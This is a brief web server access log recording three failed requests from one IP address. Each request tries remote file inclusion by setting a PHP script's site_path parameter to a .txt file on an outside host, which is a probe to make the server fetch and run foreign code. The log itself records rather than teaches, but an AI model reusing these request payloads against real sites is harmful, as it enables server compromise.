220.73.144.196 - - [07/Feb/2010:07:09:06 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:09:19 -0800] "GET //include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:09:19 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
